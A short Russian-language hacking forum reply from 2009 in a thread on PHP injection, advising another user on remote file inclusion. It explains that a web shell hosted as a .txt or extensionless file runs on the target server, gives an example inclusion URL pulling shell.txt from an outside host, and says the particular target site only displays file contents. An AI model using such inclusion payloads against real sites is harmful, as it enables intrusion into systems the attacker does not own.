Тема: php injection
Показать сообщение отдельно

  #54  
Старый 16.10.2009, 10:22
Rezak
Новичок
Регистрация: 25.01.2008
Сообщений: 5
С нами: 9628417

Репутация: 2
По умолчанию

Во первых скрипт на твоем сайте должен быть не исполняемым, то есть txt файл к примеру.
Либо вообще без расширения, то есть так:

index.php?page=http://nabstre.tu2.ru/shell.txt?

Потому что если файл исполняемый, то он исполнятся будет на твоем сервере, а на выходе будет уже результат. Поэтому выводится содержание директории на твоем сервере.


Во вторых конкретно на этом сайте бага не работает, скрипт не инклюдит файлы, а выводит их содержание.
Так что облом.

Последний раз редактировалось Rezak; 16.10.2009 в 10:27..